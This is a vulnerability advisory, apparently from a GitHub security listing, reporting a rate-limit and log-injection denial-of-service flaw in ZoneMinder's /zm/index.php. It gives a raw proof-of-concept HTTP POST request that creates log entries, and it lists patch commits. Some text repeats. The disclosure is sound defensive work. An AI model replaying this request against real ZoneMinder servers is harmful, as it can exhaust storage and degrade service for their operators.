This is a potential Denial Of Service vulnerability.
Vulnerability allows users with "View" system permissions to inject data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the "/zm/index.php" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources.
POST /zm/index.php HTTP/1.1
Host: 10.0.10.107
Content-Length: 256
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.0.10.107
Referer: http://10.0.10.107/zm/?
Content-Security-Policy: default-src 'self' data: *; connect-src 'self'; script-src 'self';
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: zmSkin=classic; zmCSS=base; zmBandwidth=high; ZMSESSID=8o8h3mg4nv7pmmsu4tm13r1v4d
Connection: close
__csrf_magic=key%3A85866fbcb6a1d7325544a55aa63fb534677f34ca%2C1665102411&view=request&request=log&task=create&level=ERR&message=Trenches%20of%20IT%20PoC&browser%5Bname%5D=Chrome&browser%5Bversion%5D=101.0.4951.41&browser%5Bplatform%5D=Windows&file=line=800
Not at this time.
trenchesofit Analyst
Impact
This is a potential Denial Of Service vulnerability.
Vulnerability allows users with "View" system permissions to inject data into the logs stored by Zoneminder. This was observed through an HTTP POST request containing log information to the "/zm/index.php" endpoint. Submission is not rate controlled and could affect database performance and/or consume all storage resources.
Example Request
Patches
de2866f
73d9f24
cb3fc59
34ffd92
Workarounds
Not at this time.
For more information
If you have any questions or comments about this advisory: